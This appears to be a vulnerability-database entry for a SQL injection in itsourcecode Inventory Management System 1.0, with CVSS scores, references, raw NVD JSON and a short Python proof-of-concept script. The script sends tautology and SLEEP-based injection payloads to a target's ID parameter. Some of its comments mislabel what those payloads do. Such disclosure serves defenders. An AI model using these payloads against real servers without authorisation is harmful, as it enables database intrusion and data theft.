CVE-2025-13257

Description

A security vulnerability has been detected in itsourcecode Inventory Management System 1.0. The affected element is an unknown function of the file /admin/user/index.php?view=edit. The manipulation of the argument ID leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed publicly and may be used.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:janobe:inventory_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE

itsourcecode Inventory Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-13257 SQL Injection PoC
# Target: itsourcecode Inventory Management System 1.0
# Vulnerability: SQL Injection in /admin/user/index.php?view=edit

def exploit_sqli(target_url, payload):
    """
    Exploit SQL injection vulnerability in itsourcecode Inventory Management System
    
    Args:
        target_url: Base URL of the vulnerable application
        payload: SQL injection payload
    
    Returns:
        Response text from the server
    """
    # Construct the malicious URL
    inject_url = f"{target_url}/admin/user/index.php?view=edit&id={payload}"
    
    try:
        # Send GET request with SQL injection payload
        response = requests.get(inject_url, timeout=10)
        return response.text
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return None

def main():
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-13257.py <target_url>")
        print("Example: python cve-2025-13257.py http://target.com/inventory")
        sys.exit(1)
    
    target = sys.argv[1].rstrip('/')
    
    # Basic test payload to verify vulnerability
    # This payload causes a SQL syntax error that may reveal database info
    test_payload = "1' OR '1'='1"
    
    print(f"[*] Testing SQL injection on: {target}")
    print(f"[*] Payload: {test_payload}")
    
    result = exploit_sqli(target, test_payload)
    
    if result:
        if 'sql' in result.lower() or 'error' in result.lower() or 'mysql' in result.lower():
            print("[+] Vulnerability confirmed! SQL error detected in response.")
            print("[*] Response excerpt:")
            # Print first 500 characters of response
            print(result[:500])
        else:
            print("[-] No obvious SQL error detected. Manual verification needed.")
    
    # Example: Database enumeration payload (MySQL)
    # Extract current database name
    enum_payload = "1' AND (SELECT CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END)-- -"
    print(f"\n[*] Testing boolean-based blind injection with SLEEP...")
    exploit_sqli(target, enum_payload)

if __name__ == "__main__":
    main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-13257
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-13257
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-13257/
[4] VulDB https://vuldb.com/cve/CVE-2025-13257
[5] https://github.com/iamzzzzz/iam/issues/3
[6] https://itsourcecode.com/
[7] https://vuldb.com/?ctiid.332592
[8] https://vuldb.com/?id.332592
[9] https://vuldb.com/?submit.687863

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-13257", "sourceIdentifier": "[email protected]", "published": "2025-11-17T02:15:42.123", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in itsourcecode Inventory Management System 1.0. The affected element is an unknown function of the file /admin/user/index.php?view=edit. The manipulation of the argument ID leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed publicly and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:janobe:inventory_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "2F165A72-35AF-4A34-91F9-F8AF5B0B8568"}]}]}], "references": [{"url": "https://github.com/iamzzzzz/iam/issues/3", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://itsourcecode.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://vuldb.com/?ctiid.332592", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.332592", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.687863", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}